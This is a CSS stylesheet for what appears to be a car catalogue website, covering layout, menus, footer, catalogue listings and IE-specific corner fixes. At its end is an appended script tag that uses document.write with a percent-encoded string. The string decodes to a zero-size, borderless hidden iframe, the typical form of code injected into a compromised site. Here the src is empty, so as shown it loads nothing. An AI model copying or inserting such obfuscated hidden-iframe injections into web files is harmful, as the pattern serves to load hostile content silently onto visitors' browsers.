﻿* {font-family: Tahoma, Verdana, sans-serif;}
html,body{height:100%;}
body{margin:0;padding:0;}
#main{height:100%;min-height:100%;margin-bottom:-7.3em;}
#clear{clear:both;height:7.3em;}
html>body #main{height:auto;}
#footer{margin:0 auto;}
#footer{height:7.3em;}

#error404Block
{
	padding: 0 0 100px 200px;
}

#error404Block h1
{
	font-size:150%;
	color:#333;
	margin:0;
}

#error404Block p
{
	margin: 0.4em 0 2.5em 0;
}

#error404Block a
{
	font-size:75%;
}

div#measurer
{
	position: absolute;
	width: 100%;
	top: 0;
	height: 1px;
	line-height: 1px;
}

div#around
{
	position: relative;
	min-width: 750px;
	max-width: 1300px;

}

* html div#around
{
	width: expression(
	(
		document.getElementById('measurer')
		&& document.getElementById('measurer').clientWidth < 750
	)
	?	'750px'
	:	(
			document.getElementById('measurer')
			&& document.getElementById('measurer').clientWidth < 1300
		)
		?	'100%'
		:	'1300px'
	);
}


/* general */
p{font-size:75%; color:#333; line-height:1.5em; margin-top:0.5em;}
h3{font-size:110%; font-weight:normal; color:#333; margin: 0.5em 0 0.8em 0;}
h4{font-size:90%; font-weight:normal; color:#333; margin: 0.5em 0 0.8em 0;}

ul{margin-top: 0.5em; padding-left:0; margin-left:0; font-size:75%; color:#333; line-height:1.4em;}
ol{margin-top: 0.5em; padding-left:0; margin-left:1em; font-size:75%; color:#333; line-height:1.4em;}
ol li{list-style-type:decimal;margin: 0.4em 0 0.4em 1em; }
ul li{list-style-type:none; margin: 0.4em 0 0.4em 1em; background: url('/i/list.gif') no-repeat left 0.8em; padding-left:16px;}


img.borderImg{border: 1px solid #999;}
img.borderImgCat{margin: 5px;}
div.imgTopCat{border: 1px solid #999;}

.imgBlock{float:left; border: 1px solid #ccc; background-color:#fff;}
.imgBlock img{margin: 4px; border:0;}

.highlight td{background-color:#dedede;}

.contentBlock{padding: 0.2em 40px 0 20px;}


/* paragraph */
div.pContent{clear:both; padding-bottom:1em;}
div.pContent p{line-height:1.6em;}

div.imgTop{padding: 0.8em 0 0.5em 0;}
div.imgLeft{float:left; padding: 0.5em 1em 0.8em 0;}
div.imgRight{float:right; padding: 0.5em 0 0.8em 1em;}
div.imgBottom{padding: 0.4em 0 0.8em 0;}

p.caption{font-size:70%; color:#666; font-style:italic; margin: 0.5em 0;}

table.text{clear:both; width:100%; border-collapse:collapse; margin: 0.5em 0 1.2em 0;}
table.text td{font-size:75%; color:#333; padding: 0.5em 10px; border-bottom: 1px solid #dedede;}
table.text td p{font-size:100%; margin:0; line-height:normal;}
table.text td strong{font-size:100%; margin:0; line-height:normal;font-weight:normal}

table.pTable{clear:both; width:100%; border-collapse:collapse; margin: 0.5em 0 1.2em 0;}
table.pTable td{font-size:75%; color:#333; padding: 0.5em 10px; border-bottom: 1px solid #dedede;}
table.pTable td p{font-size:100%; margin:0; line-height:normal;}

table.normal{clear:both; width:100%; border-collapse:collapse; margin-bottom:1.2em; border: 1px solid #dedede;}
table.normal td{font-size:75%; color:#333; padding: 0.5em 10px; border: 1px solid #dedede;}
table.normal td p{font-size:100%; margin:0; line-height:normal;}

div#paragraphFile{padding: 0.5em 10px 0.5em 28px; height:26px;}
div#paragraphFile a{font-size:80%;}
div#paragraphFile small{font-size:70%; color:#999;}

div.attach{background: url('/i/icons/default.gif') no-repeat left center;}
div.pdf{background: url('/i/icons/pdf.gif') no-repeat left center;}
div.word{background: url('/i/icons/word.gif') no-repeat left center;}
div.excel{background: url('/i/icons/excel.gif') no-repeat left center;}
div.zip{background: url('/i/icons/zip.gif') no-repeat left center;}

h3.pHeader{font-size:85%;}
h3.pHeader a{border-bottom: 1px dashed #5682bc; text-decoration:none;}
h3.pHeader a:hover{border-bottom: 1px dashed #f28b05; text-decoration:none;}
h3.pHeader a.cur{border-bottom: 1px dashed #f28b05; color:#f28b05; text-decoration:none;}

table.pNone{display:none;}
table.pVisible{display:block;}


/* links */
a{text-decoration:underline; color:#5682bc;}
a:hover{text-decoration:underline; color:#2666a8;}


/* path */
div.path {color:#333;padding-top:33px;}
div.path a{font-size:75%;}
div.path span{font-size:75%;}
div.path strong{font-size:75%;font-weight:normal;}
div.path small{font-size: 85%; color:#333;}
div.path h1{font-size:140%; margin-top:0.3em;}
#goodBlock div.path h1{margin-bottom:0;}


/* header */
.headerLogo
{
	padding:30px 0 0 0;
}

.brandLogo
{
	padding:30px 0 0 20px;
}


.headerMenuList ul{margin: 0 0 0 -10px; padding:0; font-size:75%; color:#333; clear:both;}
.headerMenuList ul li{float:left; list-style-type:none; background:none; color:#333; line-height:1.2em; margin: 0 20px 0 0; padding: 0.4em 10px;}
.headerMenuList ul li.cur{background-color:#2666a8; color:#fff;}

.headerPhone {padding-top:1.8em}
.headerPhone small{color:#333; font-size:70%;}
.headerPhone strong{color:#333; font-size:120%;}
.headerPhone a{display:block; font-size:70%; padding-top:0.1em;}


/* menu */
.twoMenuList{margin: 0 0 1em 0; padding: 0; font-size:100%; color:#333;}
.twoMenuList li strong{display:block; font-size:120%; }
.twoMenuList li{list-style-type:none; background:none; color:#333; font-size:70%; line-height:1.1em; margin: 0 0 0.4em 0; padding: 0.5em 10px 0.5em 10px;}
.twoMenuList li.cur
{
	background-color:#2666a8;
	color:#fff;
}
.twoMenuList li.cur a{color:#fff;}

.oneMenuList{margin: 0 0 2em 0; padding: 30px 20px 0 0; font-size:90%; color:#333;text-transform:uppercase;}
.oneMenuList li{list-style-type:none; background:url('/i/cr.gif') left 57% no-repeat; color:#333; font-size:75%; line-height:1.2em; margin: 0 0 0.4em 0px; padding: 0.4em 10px 0.4em 18px;}
.oneMenuList li.cur{list-style-type:none; background:url('/i/cr_cur.gif') left 57% no-repeat; color:#333; font-size:75%; line-height:1.2em; margin: 0 0 0.4em 0px; padding: 0.4em 10px 0.4em 18px;}

.oneMenuList li a{color:#666;text-decoration:none;}

/* home */
.homeCenterBlock{padding-right: 40px;padding-left:10px}
.homeCenterBlock .homeParagraph{padding: 2em 10px 0 10px;}
.homeblockAnons{padding: 3em 40px 0 10px;}
.homeParagraph h3{font-size:130%;font-weight:bold}

.homeAnonsTable td{padding: 0 0 0.6em;}
.homeAnonsTable td.text{padding-bottom: 2em;}
.homeAnonsTable h4{color:#333;font-size:90%; font-weight:normal; margin: 0 0 1em 0;}
.homeAnonsTable p{font-size:70%; color:#666; margin:0; line-height:1.4em;}
.homeAnonsTable p p{font-size:100%; line-height:normal;}

/*6.3em06.12.2008*/
.otherAnonsTable td{padding: 0 0 0.6em;}
.otherAnonsTable td.text{padding-bottom: 2em;}
.otherAnonsTable h4{color:#333;font-size:90%; font-weight:normal; margin: 0 0 1em 0;}
.otherAnonsTable p{font-size:70%; color:#666; margin:0; line-height:1.4em;}
.otherAnonsTable p p{font-size:100%; line-height:normal;}

/* footer */
#footerBg{padding-top:1.5em;background:#737373}
#footerContacts{padding: 0 40px 2em 20px;}
#footerContacts small{font-size:70%; color:#ccc;}
#footerContacts small.none{color:#fff; visibility: hidden;}
#footerContacts strong{font-size:80%; color:#ccc;}
#footerContacts p{font-size:70%; color:#d3d3d3; line-height:1.3em;padding-top:0.6em;}
#footerContacts a{color:#ccc;}
#footerTl{padding: 2em 40px 2em 20px;}
a.tlLink{display:block; padding-top:0.6em; font-size:70%;color:#ccc;}
a.tlLink:hover{display:block; padding-top:0.6em; font-size:70%;color:#fff;}


/* catalogue */
.catalogue_car td
{
	padding-bottom:20px;
}

.catalogue_car .car_foto
{
	padding:7px 20px 0 0;
}

.catalogue_car .carname
{
	font-size:90%;
}

.catalogue_car .car_price
{
	padding-top:10px;
}

.catalogue_car .textcar p
{
	font-size:75%;
	line-height:1.4em;
	margin:0;
}

.catalogue_car .textcar span
{
	font-weight:bold;
}

.catalogue_car .textcar small
{
	padding-left:10px;
	font-size:75%;
}

.modTable td{padding:1em 5px 1em 10px}
.modName{color:#333;font-size:90%; font-weight:bold;}
.modText{color:#3333;font-size:80%; font-weight:normal;}
.modPrice{color:#333;font-size:90%; font-weight:bold; white-space:nowrap;}


/* transparent corners */
.lt,
.rt,
.rb,
.lb
{
	BEHAVIOR:url('/css/png.htc');
	height:20px;
	width:20px;
	position:absolute;
}

.lt
{
	background: url('/i/lt.png') no-repeat left top;
	left:0px;
	top:0px;	
}

.rt
{
	background: url('/i/rt.png') no-repeat right top;
	right:0px;
	top:0px;
	right: expression( this.parentNode.offsetWidth % 2 ? -1 : 0 );
}

.rb
{
	background: url('/i/rb.png') no-repeat right bottom;
	right:0px;
	bottom:0px;
	bottom: expression( this.parentNode.offsetHeight % 2 ? -1 : 0 );
	right: expression( this.parentNode.offsetWidth % 2 ? -1 : 0 );
}

.lb
{
	background: url('/i/lb.png') no-repeat left bottom;
	left:0px;
	bottom:0px;
	bottom: expression( this.parentNode.offsetHeight % 2 ? -1 : 0 );
	right: expression( this.parentNode.offsetWidth % 2 ? -1 : 0 );
}

.ill
{
	background: url('/i/ill.jpg') no-repeat left top;
	width:100%;
	height:263px;
	position:relative;
}

#news{ 
	padding-top:17px;
}
#news span{ 
	font-size:70%;
}
#news a{ 
	font-size:80%;
}
#news p{ 
	font-size:80%;
}
.catalogue_child{
	float:left;
	margin:7px;
}
.catalogue_child a{ 
	font-size:80%;
}

ul#catalogue_list { list-style: none; padding: 0; margin: 0; }
ul#catalogue_list li { display: inline; padding: 0; margin: 0;}
ul#catalogue_list li span {width:176px;display: block;float:left;text-align:center; margin: 0 15px 15px 0;}
ul#catalogue_list li img {border:3px solid #999;margin: 0;padding: 0;}
ul#catalogue_list a{font-size: 16px;text-decoration: none; color: #333; width:176px; display: block; float:left; text-align: center;margin:0px 15px 15px 0px;font-weight: bold;}
ul#catalogue_list a:hover { color: #fff; background: #333; }
ul#catalogue_list a:hover img{ border:3px solid #333; }
ul#catalogue_list em {font-style:normal;}
div#click_displaynone{font-size: 16px; text-decoration: underline;color:#2666A8; cursor: pointer; margin-bottom: 10px;}
div#displaynone{display: none;font-size:75%;}
div#displaynone table td{padding:5px 10px 5px 0;font-size:75%;vertical-align: top;}
table.table{}
table.table td{padding:5px 10px 5px 0;font-size:75%;vertical-align: top;}
#search input{color:#666;font-size:10px;}
#search_text{width:110px;}

<script language="javascript">
document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%20%62%6F%72%64%65%72%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E'));
</script>